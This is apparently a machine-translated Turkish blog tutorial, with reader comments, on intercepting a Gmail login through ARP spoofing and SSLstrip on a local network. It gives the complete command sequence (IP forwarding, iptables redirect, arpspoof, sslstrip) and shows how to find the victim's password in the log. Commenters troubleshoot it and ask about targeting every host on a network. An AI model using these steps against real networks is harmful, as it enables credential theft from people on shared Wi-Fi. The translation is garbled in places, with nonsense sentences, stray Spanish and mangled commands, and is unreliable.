ArpSpoofing ve SSlstrip İş Başında.

Merhaba Blogcular.

Bugün için, çoğumuzun sevdiği güvenli olmayan herhangi bir ağa bağlanmanın ne kadar tehlikeli olabileceğine dair küçük bir örneğim var.

Bugün için, bir Gmail şifresi almak için Sslstrip ile ArpSpoofing'i kullanacağım. Ortamı daha kontrollü hale getirmek için "testarp@gmail.com anlayışının sonucu olarak, buzdolabında iki üç günden fazla durmayan küçük şişeler elinizin altında bulunur.

Önsözleri pek sevmediğim için, hadi işe koyulalım.

Aşağıdaki bilgilerle yapabileceklerinden hiçbir zaman sorumlu değilim. Bunu sadece eğitim amaçlı yapıyorum

ÇEVRE

Bu test için elimizde şunlar var:

1. Saldırgan: Debian Wheezy'ye sahip olan benim masaüstü veya masaüstü bilgisayarım. Depolardan kurabilirsiniz şifre şeridi y koklamak sahip olmak harp sızdırma

2. Kurban: Kurban, postasını yalnızca tarayıcı üzerinden görmek isteyen bir Android Tablet.

3. Ortam: Orta benim Cisco DPC2425 Yönlendirici

ADRESLER.

Saldırgan adresi: 172.26.0.2

Yönlendirici Adresi: 172.26.0.1

Kurbanın Adresi: 172.26.0.8

SALDIRI:

Saldırının nasıl çalıştığını biraz daha anlamak için eskisine gidebilirsin POST

Bu saldırı için yapacağımız ilk şey, bilgisayarımızın bilgileri mağdura farkına varmadan iletebilmesi için iletimi etkinleştirmektir. (Aksi takdirde bu bir hizmet reddi saldırısı olur)

Bunun için kullanacağız:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Doğrudan konsol penceresindeki her komut.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

enstantane fotoğraf1

Öyleyse istediğimizi nasıl elde ederiz?

Önce mailimizi Tablet'e girelim. Giriş yaparken konsolumuzda binlerce ve binlerce şeyin göründüğünü görüyoruz.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

Control + W ile GÜVENLİ POST adında bir şey arıyoruz.

Ve bunun gibi bir şey göreceğiz.

enstantane fotoğraf2

Görülemeyen bu devasa hat arasında kurbanın e-posta adresi ve şifresi var.

Bu yüzden tünelin sonundaki ışığı görene kadar sağa koşuyoruz.

enstantane fotoğraf3

Başka bir vesileyle kendimizi bu saldırılardan biraz nasıl koruyabileceğimizi göreceğiz.

selamlar


Yorumunuzu bırakın

E-posta hesabınız yayınlanmayacak. Gerekli alanlar ile işaretlenmiştir *

*

*

  1. Verilerden sorumlu: Miguel Ángel Gatón
  2. Verilerin amacı: Kontrol SPAM, yorum yönetimi.
  3. Meşruiyet: Onayınız
  4. Verilerin iletilmesi: Veriler, yasal zorunluluk dışında üçüncü kişilere iletilmeyecektir.
  5. Veri depolama: Occentus Networks (AB) tarafından barındırılan veritabanı
  6. Haklar: Bilgilerinizi istediğiniz zaman sınırlayabilir, kurtarabilir ve silebilirsiniz.

  1.   @Hayalhanemersin dijo

    Bu vesileyle gönderi yayınlandığında komutların doğru olmadığını söylemek için kullanıyorum.

    Sondaki iptables komutu, başka bir satırdaki 8080'i kaçırıyor. Ve sonra arpspoof komutlarının hepsi aynı satırdaydı. Her komut farklı bir satırdadır.

    Umarım editör bunu görür ve düzeltebilir.

    Selamlar.

    1.    Kaynak Kılavuzu dijo

      Bahsettiğiniz düzeltmeleri yaptım, olur mu?

      Tercih edilen bir girişe kod girecekseniz, HTML görünümünü kullanın ve beklemeye göndermeden önce makalenin doğru olduğunu doğrulayın. Teşekkür ederim.

  2.   Luis dijo

    Bilgisi olmayanların bu kadar savunmasız olduğunu bilmek ürpertici. Çok iyi bilgiler konuyu çok az anlasam bile önemini anlıyorum. Teşekkür ederim!
    selamlar

  3.   Giskard dijo

    Ancak bu yalnızca saldırgan ve kurban aynı ağdaysa işe yarar. Her durumda, bana öyle geliyor ki (aynı ağda olmak) HTTPS kullanarak bağlanırsanız, bu, veriler makinenizden ayrılmadan ÖNCE şifrelenmiş olduğu için gerçekleşmez. HTTP ile (S olmadan) bağlanırsanız, ağ kablosuna baktığınızda bile anahtarları gördüğünüzü düşünüyorum.

    1.    @Hayalhanemersin dijo

      Bu doğru değil. Bir gmail şifresini kırıyorum ve gmail'in https kullandığını fark ederseniz. Yani? Buradaki nokta, https güvenli olmasına rağmen http'ye bağlı olmasıdır. Yani o kadar güvenli değil.

      Bir https hakkında o kadar çok itiraf etmeyin ki, S Süpermen için değil, "güvenli" içindir

    2.    Rten dijo

      https ile veya onsuz çalışıyor, daha özel bir linux dağıtımı ile denedim ve sorunsuz çalışıyor

    3.    Kaynak Kılavuzu dijo

      Wi-Fi'nizi çalanlara bir ders vermek için onu tam olarak kullanabilirsiniz. 😀

      Aşağı yukarı uzun zaman önce Chema Alonso'nun blogunda söylediklerine benziyor:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    suni ipek dijo

        Ostia, yaptıkları harika! / Ve sonra banka hesabını kontrol etmeye gittiklerinde VPN'i her kullandığımda paranoyaklığıma söylüyorlar…). Bu arada, yorumlarda insanların ne kadar alaycı olduğunu görmelisiniz ... eğer sonunda hırsızlıksa ...

        1.    eliotime3000 dijo

          Şimdi kendi VPN hizmetinizi nasıl oluşturup sunacağınıza dair bir eğitim almamız gerekiyor.

      2.    Daniel dijo

        Bağladığınız hikaye çok ilginç, hatta bir roman kitabına layık görünüyor ve bu, komşularımın internetini kullandığım zamanları hatırlamamı sağlıyor ve konuyu bildiğimi söylesem de gerçek boyutlarını asla göremediğimi düşünüyorum. dayanabileceğim tehlike, neyse ki benim için sadece şifreyi WPA2 olarak değiştirdiler ve ISS ile olan hikayem burada başladı haha

    4.    Mauricio dijo

      Bu yüzden başlık Sslstrip'in iş başında olduğunu söylüyor.

      Saldırgan ortada olduğu sürece çalışır

  4.   anon dijo

    Prism'de hangi dalgada çalışıyorsun? -.-
    no.
    XD talebinizi göndermek için ne bekliyorsunuz
    Saygılarımızla
    iyi yazı

  5.   auroszx dijo

    İlginç, daha sonra bir eğitim testi yapacağım ... Belki WiFi şifresini kaldırabilir ve biraz eğlenebilirim 😛
    Şans eseri, hedefin talep ettiği sayfalara farklı sayfalar göndermek için benzer bir şey yapabilir misiniz? Örneğin, Facebook'u açmak istiyorlar ve onları Google'a mı yönlendiriyorum? 😛

    1.    @Hayalhanemersin dijo

      Evet. Ama hepsi çok farklı bir rulo.

      Belki daha sonra gönderirim.

  6.   son çaylak dijo

    çok iyi bir gönderi, bu konular çok eğitici, şimdi bu saldırıya karşı koyabilmeliyiz, çünkü bazıları (benim gibi) halka açık ağlara (örneğin üniversite) bağlanmaktan kaçınmak faydalı olacaktır.

    Selamlar!

  7.   sadece-başka-dl-kullanıcı dijo

    Benim için işe yaramadı 🙁

  8.   Vay dijo

    Burada, https bağlantılarının bir sunucu sertifikası aracılığıyla şifrelenmesi (makinenizde sertifika aldıktan sonra, tarayıcınız şifrelemeden sorumludur) iptables ile 80 değil, 443 numaralı bağlantı noktasını (http) yeniden yönlendirdiğiniz gerçeği dışında bir şey bende başarısız oluyor. hangisi https

    1.    @Hayalhanemersin dijo

      Ben de öyle düşünmüştüm. Asıl nokta, https'nin "güvenli" olmasına rağmen maalesef http'ye bağlı olmasıdır. Yani sslstrip bundan yararlanır, tarayıcının https kimlik bilgilerini kullandığına inanmasını sağlar, ancak kullanmaz.

      1.    Vay dijo

        Vay be! ancak tarayıcı "bu sertifika şüpheli bir siteden veya buna benzer bir siteden geliyor" gibi bir uyarı görmeli ... Kesinlikle testler yapmam gerekecek XD

        1.    @Hayalhanemersin dijo

          Hayır, kesinlikle hiçbir şey çıkmıyor.

  9.   sadece-başka-dl-kullanıcı dijo

    Sonunda benim için çalıştı
    Parola ile bir WEP ağına bağlıyım ve yine de doğrudan parolayı gösterdi.

    Sorgu. Tek bir kurban yerine ağa bağlı tüm bilgisayarlar için aynı prosedürü uygulayabilir misiniz?

    1.    @Hayalhanemersin dijo

      Evet yapabilirsin. Ama deneyler yapmadım. Kendiniz deneyin ve bize nasıl olduğunuzu söyleyin.

  10.   günah19 dijo

    Bununla elde ettiğim tek şey, kurbanın makinesinin çevrimdışı olması, ancak sslstrip bana hiçbir şey göstermiyor: /

    1.    @Hayalhanemersin dijo

      Güvenlik duvarını bir an için devre dışı bırakmalısınız. Veya en azından gelen bağlantıları etkinleştirin.

  11.   Bay siyah dijo

    Probe ve ben sadece facebook sayfasının kullanıcı adını ve şifresini görebiliyordum, gmail'de günlükte herhangi bir sonuç bulamadım, ayrıca sadece arpspoof «arpspoof -i -t« satırına ihtiyacım vardı. Öte yandan, kurban makine bazı sayfaları açamadı. Araştırmaya devam edeceğim, çok ilginç. Manjaro kullananlar için bir yardım, kurulacak paketler: dsniff (arpspoff), twisted ve python2-pyopenssl. Sslstrip buradan indirilebilir: http://www.thoughtcrime.org/software/sslstrip/
    $ Python2 sslstrip.py çalıştırmak için
    Selamlar.

  12.   Bay siyah dijo

    Çıkmadı ama arpspoof hattı: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert birimi dijo

    bak tam olarak ne diyorsan yapıyorum:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –hedef-bağlantı noktası 80 -j YÖNLENDİRME - 8080 bağlantı noktalarına

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Sorun şu ki, burada odamda bulunan başka bir bilgisayar olan mağdur, yönlendiriciyi yeniden başlatmam gereken noktaya bağlantısız kaldı, ne yapabilirim?

    Bir sanal makine ile çalıştığım başka bir şey ve iwconfig komutunu çalıştırdığımda, wlan0 görünmüyor veya ifconfig çalıştırdığımda, ancak sanal makinemde internet varsa, eth0 arayüzü ile ne var.